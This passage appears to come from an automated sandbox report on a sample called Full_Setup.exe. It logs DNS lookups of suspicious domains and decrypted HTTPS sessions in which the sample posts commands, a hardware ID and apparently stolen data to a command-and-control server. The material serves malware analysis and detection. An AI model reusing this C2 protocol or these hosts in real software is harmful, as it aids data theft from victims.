Jan 5, 2025 17:48:35.570508003 CET	49759	443	192.168.2.4	104.21.37.128
Jan 5, 2025 17:48:35.570514917 CET	443	49759	104.21.37.128	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 17:48:11.453454971 CET	61207	53	192.168.2.4	1.1.1.1
Jan 5, 2025 17:48:11.467052937 CET	53	61207	1.1.1.1	192.168.2.4
Jan 5, 2025 17:48:27.435628891 CET	58650	53	192.168.2.4	1.1.1.1
Jan 5, 2025 17:48:27.540868998 CET	53	58650	1.1.1.1	192.168.2.4
Jan 5, 2025 17:48:28.531687975 CET	53252	53	192.168.2.4	1.1.1.1
Jan 5, 2025 17:48:28.543872118 CET	53	53252	1.1.1.1	192.168.2.4
Jan 5, 2025 17:48:29.153652906 CET	64461	53	192.168.2.4	1.1.1.1
Jan 5, 2025 17:48:29.163202047 CET	53	64461	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 17:48:11.453454971 CET	192.168.2.4	1.1.1.1	0xc1e1	Standard query (0)	aloofysofar.click	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:27.435628891 CET	192.168.2.4	1.1.1.1	0xc9d0	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:28.531687975 CET	192.168.2.4	1.1.1.1	0xb4df	Standard query (0)	klipvumisui.shop	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:29.153652906 CET	192.168.2.4	1.1.1.1	0x4a85	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 17:48:11.467052937 CET	1.1.1.1	192.168.2.4	0xc1e1	No error (0)	aloofysofar.click		172.67.196.191	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:11.467052937 CET	1.1.1.1	192.168.2.4	0xc1e1	No error (0)	aloofysofar.click		104.21.36.159	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:27.540868998 CET	1.1.1.1	192.168.2.4	0xc9d0	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:28.543872118 CET	1.1.1.1	192.168.2.4	0xb4df	No error (0)	klipvumisui.shop		104.21.37.128	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:28.543872118 CET	1.1.1.1	192.168.2.4	0xb4df	No error (0)	klipvumisui.shop		172.67.208.58	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:48:29.163202047 CET	1.1.1.1	192.168.2.4	0x4a85	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

aloofysofar.click

cegu.shop

klipvumisui.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49748	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:12 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: aloofysofar.click
2025-01-05 16:48:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 16:48:12 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a8ks31et9a86jgb92movdus1b5; expires=Thu, 01 May 2025 10:34:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLeYbEAEDzzS4ucVwEfiA22P%2BHFsCs6cWkuYiK0jVgogCFkPX7I8y3PCScpZWlkYWpGfGbICBiHs1xaPr9C25NKUM2ERBLxWn9Zjwe7lc2dfh%2FXtKAu5586NltY0fz4TpRH8UQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f45bcf6143d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3157&min_rtt=1816&rtt_var=1639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1607929&cwnd=221&unsent_bytes=0&cid=bf98e4465091f7e1&ts=540&x=0"
2025-01-05 16:48:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 16:48:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49749	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: aloofysofar.click
2025-01-05 16:48:13 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
2025-01-05 16:48:13 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n3tu6rr9tup4mf0gu97opb0e1h; expires=Thu, 01 May 2025 10:34:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOuJrfsVbTemOWTpcopbNq28oXqKXPjqp7a4gh9G9ARU37NVI8b3tUgYvlQxm96fZn62axe6tmzW9CmRhP%2FF%2F%2BZfbP%2BvGg54JFdsOb777p45SGWb3YRnO2TnoXsyIoIGJVm6Rg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f461fa4218b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6087&min_rtt=1732&rtt_var=3405&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1685912&cwnd=186&unsent_bytes=0&cid=6c769d1da33da6a1&ts=768&x=0"
2025-01-05 16:48:13 UTC	237	IN	Data Raw: 31 63 61 62 0d 0a 64 62 6c 54 44 4d 68 57 65 6a 68 51 6e 37 45 33 35 64 51 2b 71 75 4e 4e 64 57 4c 4a 34 72 49 52 6a 46 74 58 46 6b 62 73 53 78 45 4f 6d 79 55 75 38 6d 4a 57 47 69 50 36 6b 77 32 52 70 6b 76 50 7a 32 38 55 42 75 76 59 31 48 44 67 4b 44 49 36 5a 4a 6f 6d 4d 30 2f 66 4d 6d 43 37 4d 31 59 61 4e 65 65 54 44 62 36 76 48 4d 2b 4e 62 30 39 41 72 49 6a 51 63 4f 41 35 4e 6e 30 70 6e 43 64 79 48 64 55 30 5a 4b 30 31 48 6c 6b 38 38 74 52 53 67 4c 56 55 78 49 6f 67 48 51 2f 72 7a 70 42 30 39 6e 6c 74 4e 41 75 4a 50 33 41 34 32 43 42 6e 36 69 74 57 51 33 4c 36 33 78 58 66 39 6c 2f 50 67 53 45 54 42 71 4b 4b 32 6e 6e 6f 4f 44 4e 38 4e 6f 55 74 65 52 33 62 4e 32 57 6e 50 41 70 55 4e 76 58 66 56 49 71 Data Ascii: 1cabdblTDMhWejhQn7E35dQ+quNNdWLJ4rIRjFtXFkbsSxEOmyUu8mJWGiP6kw2RpkvPz28UBuvY1HDgKDI6ZJomM0/fMmC7M1YaNeeTDb6vHM+Nb09ArIjQcOA5Nn0pnCdyHdU0ZK01Hlk88tRSgLVUxIogHQ/rzpB09nltNAuJP3A42CBn6itWQ3L63xXf9l/PgSETBqKK2nnoODN8NoUteR3bN2WnPApUNvXfVIq
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 31 48 49 62 42 4b 41 39 41 38 38 43 44 51 65 30 6f 4a 47 45 70 6e 69 38 7a 43 4a 55 6f 4c 71 30 34 57 41 4a 79 39 64 39 62 67 72 56 54 7a 34 41 76 42 51 2b 72 67 39 68 37 36 6a 4d 36 65 79 75 41 49 33 51 66 30 6a 5a 68 72 54 77 65 56 54 47 39 6e 52 57 41 72 68 79 51 77 51 38 48 41 36 69 55 33 57 4b 75 4a 6e 74 74 5a 49 6b 6c 4d 30 2b 62 4e 32 43 72 4f 52 68 49 4f 76 62 59 55 4a 57 39 56 63 57 4d 4c 78 6f 4b 70 49 50 51 64 4f 51 7a 4f 6e 34 67 67 79 52 31 46 39 74 78 49 4f 6f 7a 41 42 70 71 76 66 42 51 6c 37 46 51 33 73 4d 56 56 78 2f 6c 6d 5a 42 30 34 6e 6c 74 4e 43 79 4c 4b 6e 41 63 31 44 4a 6d 6f 53 59 59 53 44 54 77 31 6b 65 42 73 31 4c 43 67 6a 30 64 44 71 32 44 32 58 6a 6e 50 44 4a 77 5a 4d 42 70 64 41 2b 62 61 53 36 4c 4f 52 4e 57 4f 4f 72 54 46 5a Data Ascii: 1HIbBKA9A88CDQe0oJGEpni8zCJUoLq04WAJy9d9bgrVTz4AvBQ+rg9h76jM6eyuAI3Qf0jZhrTweVTG9nRWArhyQwQ8HA6iU3WKuJnttZIklM0+bN2CrORhIOvbYUJW9VcWMLxoKpIPQdOQzOn4ggyR1F9txIOozABpqvfBQl7FQ3sMVVx/lmZB04nltNCyLKnAc1DJmoSYYSDTw1keBs1LCgj0dDq2D2XjnPDJwZMBpdA+baS6LORNWOOrTFZ
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 6a 54 30 62 43 71 32 50 33 58 2b 75 64 33 56 7a 50 4d 35 78 4d 7a 33 59 4a 57 32 67 64 69 31 5a 50 50 50 55 51 38 65 70 45 74 48 42 4b 42 74 41 38 38 44 64 63 75 59 2f 4a 33 73 70 6a 53 64 39 47 4e 34 2b 5a 71 6f 30 46 56 38 32 39 74 68 57 69 72 4a 4f 77 6f 45 6e 45 67 47 68 69 70 41 39 72 6a 34 74 4e 48 7a 4f 47 47 51 63 6d 51 52 74 70 44 6f 66 54 48 4c 69 6e 55 7a 48 73 56 43 49 32 57 38 61 43 4b 36 46 33 33 4c 6b 4e 7a 42 2b 4b 49 59 6e 63 41 58 55 4e 57 36 6d 50 42 4a 58 50 50 6e 62 58 49 79 39 57 73 69 41 4a 56 64 4f 36 34 66 49 4d 37 5a 35 41 58 4d 6f 67 79 59 78 49 74 67 2f 59 4b 30 69 57 45 56 38 35 4a 4e 53 69 2f 59 45 69 49 30 6d 46 77 75 68 68 4e 42 30 34 7a 77 32 63 79 65 44 4c 6e 6b 5a 33 44 56 69 6f 7a 6b 65 57 6a 58 35 31 6b 65 43 76 31 44 Data Ascii: jT0bCq2P3X+ud3VzPM5xMz3YJW2gdi1ZPPPUQ8epEtHBKBtA88DdcuY/J3spjSd9GN4+Zqo0FV829thWirJOwoEnEgGhipA9rj4tNHzOGGQcmQRtpDofTHLinUzHsVCI2W8aCK6F33LkNzB+KIYncAXUNW6mPBJXPPnbXIy9WsiAJVdO64fIM7Z5AXMogyYxItg/YK0iWEV85JNSi/YEiI0mFwuhhNB04zw2cyeDLnkZ3DViozkeWjX51keCv1D
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 52 62 72 6e 35 35 71 72 6a 34 35 4e 48 7a 4f 49 48 6f 46 31 54 39 6e 70 7a 49 51 58 54 7a 77 32 46 4f 4d 73 56 76 4f 6a 43 63 61 42 61 69 42 31 48 6e 38 4f 6a 35 2b 4b 59 52 70 50 56 66 63 4b 53 37 79 64 44 39 57 47 2b 33 49 52 35 48 32 51 34 61 59 62 78 41 4d 36 39 69 51 63 4f 45 77 4f 6e 77 73 67 53 5a 33 47 64 30 33 59 36 38 37 45 6b 67 36 38 39 35 65 69 4c 31 4f 79 49 77 72 47 77 53 6a 69 39 6f 7a 6f 48 6b 79 62 47 54 57 61 55 59 61 31 44 46 74 76 48 51 48 46 43 75 39 31 46 6e 48 37 68 7a 45 6a 79 38 59 44 4b 65 4c 32 48 4c 69 4e 7a 4a 78 4c 59 59 68 59 52 62 66 4f 57 2b 6b 4f 78 6c 65 4e 2f 6a 58 55 6f 4f 77 55 34 6a 50 62 78 41 59 36 39 69 51 58 4d 6b 4d 64 31 55 65 7a 6a 59 39 44 70 73 32 59 75 70 73 57 46 59 78 38 64 74 61 67 62 39 51 77 6f 67 6b Data Ascii: Rbrn55qrj45NHzOIHoF1T9npzIQXTzw2FOMsVvOjCcaBaiB1Hn8Oj5+KYRpPVfcKS7ydD9WG+3IR5H2Q4aYbxAM69iQcOEwOnwsgSZ3Gd03Y687Ekg6895eiL1OyIwrGwSji9ozoHkybGTWaUYa1DFtvHQHFCu91FnH7hzEjy8YDKeL2HLiNzJxLYYhYRbfOW+kOxleN/jXUoOwU4jPbxAY69iQXMkMd1UezjY9Dps2YupsWFYx8dtagb9Qwogk
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 54 54 64 2b 73 32 4e 48 55 69 6e 43 35 36 42 64 55 38 59 61 49 38 45 56 73 32 2b 4e 35 54 69 37 78 64 7a 34 38 68 48 30 44 6c 77 4e 64 72 72 6d 46 31 56 54 53 56 4f 32 55 61 2b 6a 78 68 36 69 74 57 51 33 4c 36 33 78 58 66 39 6c 58 61 68 53 49 46 43 61 79 4f 33 33 44 38 4f 44 68 2f 4e 6f 6b 6d 64 78 44 58 4e 32 47 73 4e 52 31 51 50 76 72 57 58 6f 69 36 48 49 62 42 4b 41 39 41 38 38 44 2b 65 50 30 75 4e 6e 6f 76 6d 44 49 7a 43 4a 55 6f 4c 71 30 34 57 41 4a 79 2f 74 68 65 67 37 5a 51 79 49 55 69 46 78 4b 6b 68 39 64 36 35 53 73 2f 63 79 4f 46 49 58 67 59 33 53 4e 69 70 43 59 64 53 43 43 39 6e 52 57 41 72 68 79 51 77 52 6b 51 45 4c 75 44 6b 6b 4c 34 4f 69 4e 2f 4b 59 4a 70 62 46 6e 43 63 57 6d 6d 64 45 41 61 4e 50 4c 61 56 6f 69 33 56 63 53 4d 4b 68 34 46 71 Data Ascii: TTd+s2NHUinC56BdU8YaI8EVs2+N5Ti7xdz48hH0DlwNdrrmF1VTSVO2Ua+jxh6itWQ3L63xXf9lXahSIFCayO33D8ODh/NokmdxDXN2GsNR1QPvrWXoi6HIbBKA9A88D+eP0uNnovmDIzCJUoLq04WAJy/theg7ZQyIUiFxKkh9d65Ss/cyOFIXgY3SNipCYdSCC9nRWArhyQwRkQELuDkkL4OiN/KYJpbFnCcWmmdEAaNPLaVoi3VcSMKh4Fq
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 67 43 7a 5a 76 5a 4a 46 6e 61 6c 66 63 50 53 37 79 64 42 74 64 4d 66 7a 5a 58 49 75 35 57 38 79 54 4a 52 41 53 71 6f 48 62 66 75 49 35 4f 48 6b 75 6a 79 42 2b 47 39 59 32 61 61 55 78 57 42 52 79 2b 73 73 56 33 2f 5a 39 78 59 6f 6a 54 46 72 72 6e 35 35 71 72 6a 34 35 4e 48 7a 4f 4b 58 6b 53 30 54 78 74 70 54 63 4b 57 7a 54 76 30 31 69 4e 70 46 62 44 68 43 49 61 44 61 69 47 31 6e 6a 69 4b 7a 78 30 4a 34 56 70 50 56 66 63 4b 53 37 79 64 44 74 4e 4a 50 66 55 57 5a 47 39 58 63 75 58 49 67 64 41 35 63 44 42 64 50 39 35 62 57 49 30 6d 53 35 73 57 63 4a 78 61 61 5a 30 51 42 6f 30 39 4e 56 53 67 62 68 4f 7a 59 63 67 47 41 6d 69 68 4e 68 77 37 6a 30 78 63 79 47 4e 4a 58 67 51 32 44 35 71 6f 7a 6f 52 56 58 4b 7a 6b 31 4b 66 39 67 53 49 6f 44 51 55 44 4b 62 41 7a 7a Data Ascii: gCzZvZJFnalfcPS7ydBtdMfzZXIu5W8yTJRASqoHbfuI5OHkujyB+G9Y2aaUxWBRy+ssV3/Z9xYojTFrrn55qrj45NHzOKXkS0TxtpTcKWzTv01iNpFbDhCIaDaiG1njiKzx0J4VpPVfcKS7ydDtNJPfUWZG9XcuXIgdA5cDBdP95bWI0mS5sWcJxaaZ0QBo09NVSgbhOzYcgGAmihNhw7j0xcyGNJXgQ2D5qozoRVXKzk1Kf9gSIoDQUDKbAzz
2025-01-05 16:48:13 UTC	265	IN	Data Raw: 4f 6d 53 4a 4d 54 4e 50 6d 78 46 6c 76 44 45 66 54 48 44 49 30 46 75 4a 73 55 71 49 6e 68 42 5a 51 4b 72 41 69 45 72 33 65 53 4d 30 66 4e 78 6e 4d 77 57 62 61 53 37 74 4e 77 70 49 4e 50 37 46 56 73 43 49 59 75 2b 58 4a 52 41 51 72 4a 66 66 4d 36 42 35 4f 6a 52 38 74 32 6c 36 45 4d 41 67 65 4b 63 6b 48 78 6f 4e 73 35 4e 4e 78 2b 34 63 2f 59 49 68 47 51 65 39 6b 5a 31 55 2b 44 4d 79 5a 43 4f 5a 4a 6a 4e 5a 6d 7a 63 75 38 6d 64 57 47 6a 62 73 6b 77 33 58 35 41 65 64 30 6e 68 48 55 72 54 4f 79 54 50 34 65 57 30 6d 61 73 34 37 4d 30 2b 62 64 6d 32 34 4a 68 35 5a 4a 50 36 55 61 37 6d 52 52 73 57 48 4f 41 59 2b 6c 59 66 4b 66 75 67 75 4a 44 67 78 6a 53 64 39 45 4d 31 78 49 4f 6f 37 57 41 49 4c 76 5a 73 56 75 50 67 63 30 4d 46 33 56 7a 57 6f 6a 74 35 30 2b 43 68 Data Ascii: OmSJMTNPmxFlvDEfTHDI0FuJsUqInhBZQKrAiEr3eSM0fNxnMwWbaS7tNwpINP7FVsCIYu+XJRAQrJffM6B5OjR8t2l6EMAgeKckHxoNs5NNx+4c/YIhGQe9kZ1U+DMyZCOZJjNZmzcu8mdWGjbskw3X5Aed0nhHUrTOyTP4eW0mas47M0+bdm24Jh5ZJP6Ua7mRRsWHOAY+lYfKfuguJDgxjSd9EM1xIOo7WAILvZsVuPgc0MF3VzWojt50+Ch
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 33 32 62 37 0d 0a 47 6d 33 38 75 72 48 52 41 43 6e 79 39 31 30 54 48 37 67 79 61 32 6e 70 45 56 2f 76 53 7a 7a 33 33 65 53 4d 30 66 4e 78 6e 4d 77 57 62 61 53 37 74 4e 77 70 49 4e 50 37 46 56 73 43 49 59 75 61 47 4b 52 49 48 75 38 4c 2b 65 50 6f 2b 64 54 70 6b 67 57 6b 72 4c 70 74 35 4c 70 56 36 57 45 4a 79 70 5a 4e 67 68 4c 68 53 7a 35 63 2b 57 69 36 73 68 74 56 30 2f 6e 73 62 66 7a 43 4a 61 54 31 58 33 58 45 32 2b 6e 70 59 58 69 4f 39 69 77 58 56 37 51 6d 62 31 6e 39 46 48 2b 57 5a 6b 47 57 75 59 57 63 36 5a 4a 78 70 4b 31 65 63 4d 6e 79 34 4d 68 74 4d 4d 62 72 74 61 34 53 67 55 63 65 4b 4c 69 6b 2b 68 59 33 52 63 4f 42 37 42 47 49 70 6e 69 70 32 45 4f 55 50 59 4b 30 67 48 31 51 30 2f 5a 4d 62 78 37 6b 63 6b 4c 68 76 58 30 43 55 7a 70 42 72 72 6d 46 31 Data Ascii: 32b7Gm38urHRACny910TH7gya2npEV/vSzz33eSM0fNxnMwWbaS7tNwpINP7FVsCIYuaGKRIHu8L+ePo+dTpkgWkrLpt5LpV6WEJypZNghLhSz5c+Wi6shtV0/nsbfzCJaT1X3XE2+npYXiO9iwXV7Qmb1n9FH+WZkGWuYWc6ZJxpK1ecMny4MhtMMbrta4SgUceKLik+hY3RcOB7BGIpnip2EOUPYK0gH1Q0/ZMbx7kckLhvX0CUzpBrrmF1
2025-01-05 16:48:13 UTC	1369	IN	Data Raw: 74 73 57 63 4a 78 65 4f 70 73 53 68 52 79 37 35 4d 4e 78 2f 46 66 32 70 4d 70 46 42 61 6f 78 2b 35 4e 79 54 63 79 64 54 4b 65 4a 48 38 32 32 43 42 6b 6c 41 6f 4e 57 54 7a 7a 31 45 4f 57 39 68 4b 49 6a 6d 39 50 4f 65 76 49 6b 45 79 67 65 53 30 30 66 4d 34 63 63 42 6e 56 4e 6e 69 37 65 54 39 55 4e 66 7a 46 52 59 71 36 66 63 75 51 4a 56 64 4f 36 34 61 51 4b 37 78 33 64 58 41 31 7a 6e 45 6a 52 59 42 6b 50 66 31 6b 53 6b 56 38 35 4a 4e 44 78 2b 34 4f 68 73 45 39 56 31 6a 72 78 39 4e 68 2f 44 38 32 59 69 66 4a 46 30 30 79 7a 44 4a 2b 72 44 63 6d 5a 42 6e 78 31 56 4b 64 73 56 72 75 6f 57 39 5a 51 4b 54 41 69 45 71 75 63 58 56 4c 61 73 34 78 4d 30 2b 62 42 47 32 6b 4f 68 39 4d 49 37 44 32 51 6f 53 6d 57 73 76 42 59 56 63 47 36 39 69 41 50 61 34 39 4a 44 52 38 33 Data Ascii: tsWcJxeOpsShRy75MNx/Ff2pMpFBaox+5NyTcydTKeJH822CBklAoNWTzz1EOW9hKIjm9POevIkEygeS00fM4ccBnVNni7eT9UNfzFRYq6fcuQJVdO64aQK7x3dXA1znEjRYBkPf1kSkV85JNDx+4OhsE9V1jrx9Nh/D82YifJF00yzDJ+rDcmZBnx1VKdsVruoW9ZQKTAiEqucXVLas4xM0+bBG2kOh9MI7D2QoSmWsvBYVcG69iAPa49JDR83

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49750	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:14 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TOU8M2Q9GKMU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18126 Host: aloofysofar.click
2025-01-05 16:48:14 UTC	15331	OUT	Data Raw: 2d 2d 54 4f 55 38 4d 32 51 39 47 4b 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 54 4f 55 38 4d 32 51 39 47 4b 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 4f 55 38 4d 32 51 39 47 4b 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 54 4f 55 38 4d 32 51 39 47 4b 4d 55 0d 0a 43 Data Ascii: --TOU8M2Q9GKMUContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--TOU8M2Q9GKMUContent-Disposition: form-data; name="pid"2--TOU8M2Q9GKMUContent-Disposition: form-data; name="lid"hRjzG3--ZINA--TOU8M2Q9GKMUC
2025-01-05 16:48:14 UTC	2795	OUT	Data Raw: a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2025-01-05 16:48:15 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=75btjhc2611t58iadr9mntspta; expires=Thu, 01 May 2025 10:34:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tLbdvJ6GWIT41EPr7NZ7qSv%2Bhxopvuv6ufWryqBeKEEC%2FWfjqUXAiae5MMpSaQLCna8USLgcAXgwPEsZqMC4Ap%2FyC5nwBD2IzG5d14UsLw9HGpUDOrVqBcwqHUNadQk2ONvmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f46d9a155e62-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1788&rtt_var=671&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19083&delivery_rate=1633109&cwnd=139&unsent_bytes=0&cid=9937e00b68389930&ts=642&x=0"
2025-01-05 16:48:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 16:48:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49751	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:16 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9WXPW0MEMNZKXT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8759 Host: aloofysofar.click
